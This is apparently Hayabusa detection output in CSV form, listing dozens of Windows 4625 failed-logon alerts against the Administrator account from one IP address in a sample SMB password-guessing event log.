2016-09-20 01:50:21.422 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DyLvo5Bn2HzyANdH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NaXNThuZDGqJ7oCP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.505 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 42Sb7p19cQsEV30b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.540 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: An6629wgflzSgqY5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iO7JktEihqddmEtv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nG97BFOgKxnZaqi4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SH2D24c6nRGDL4Oe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uiu2yfaM2JQQZoLF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YQx9PG8DtR2tMjvS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.792 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OoAWryajKhLD7RyY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.836 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PgewSeaVugP1TXss : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.911 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sPMCPdCAnz4upz8X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dUbV6xnGeBWE8Dif : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.001 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dIJ9mZczFO1GKItV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wW0vxE4o68L70Sra : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: upOn9DzB1yWtntyX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m9uGgocAVReiJWDm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qm9Jf1fles2HOb3g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ev5eTWdf3CskOMuh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.223 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QoiMO6sSLOm4fOD5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xDjvMsa2IgR9KO7l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.293 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SR7gVjxHZDYeK7pJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.323 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4jzGAepr7JeNKuuk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.368 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H9baxEeRCWjx6Fzr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.405 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Uy7aTt0B4ErguacA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.431 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nvKcLrUXqu2vTKO3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PLycXLeAU21pdnXL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.527 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SgwjJSKOPnurDWW4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YPDYdxPoQAl8aGMs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.594 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CX8knunlT6SMpmQw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.632 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AAjYbt50leZt3Xve : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3CD0HUCdg4UWOiji : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.709 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dkeWmTE1R1rYaYP8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.744 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W87qcfSj4qWWUv4k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.830 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WUCyUQgbUqwaLj3J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.877 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q9nLhDbcvmVBZp4f : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.925 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BBWo1zDdjaAeGDWW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.960 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vjHRFk2flmzzd1zg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:23.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 53HYxs9s7fpP1y6V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:23.035 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tluqXKvVooP7VNyB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:23.076 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 43m0nfi5tiv4TpSB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:23.107 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qjPyJXl984vViV6L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:23.143 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MomQ8Yt51VsMiO4p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:23.175 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LJYCi5r2otMHxA8f : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:23.211 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4oUSkMBI8SGDLwYC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:23.251 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j1x3lyRjxn73KITB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:23.283 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gh05BhGpwq1ho62a : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:23.324 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bxj6ITbiciyRNLbF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:23.370 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Uev2mjCaqHjm6NYi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:23.415 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L4WU383o9E5JyM5V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:23.450 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lfMv0lsoiRnTCFXe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:23.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XL4ahBqUyGeTONkE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:23.549 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8hJ888Kmyi6KqIPn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:23.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VZ6sfYMHuygnMdY2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:23.636 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XkuSlyTNc5OOoUtd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:23.676 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5Z13YmupcMato8Sd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:23.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JedeMnLPnRJEwhZ9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:23.810 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mmy0c0wFheIRzSo4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:23.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sskKdqku5S0f1sWm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:23.962 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 15Qg0nCXNj7Ub1Sj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:24.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZD6iuaqv70k69G87 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:24.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gk3UuqTJmvH1snmN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:24.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zaw9iF5mJlyygdnB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:24.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Sr5PZAd1qMc7hi3c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:24.167 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l5xbQtyueVq3fJSG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:24.203 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g2nP0zz2ofBxTGw6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:24.237 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SYJheREJmEwj0791 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:24.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: exglD9fnLwaqwRZn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:24.325 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8bSAU1QjasDAsmry : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:24.363 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cfnrtXR7evQBbaOw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:24.410 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KYAwjW99chcntPsQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:24.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rG2PYfOTfT7QvbPu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:24.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FojDtfDNXq0gQfYu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:24.549 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SUTT0QycbFtyJfNL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:24.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gcbv1lrcYdT9Wuli : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
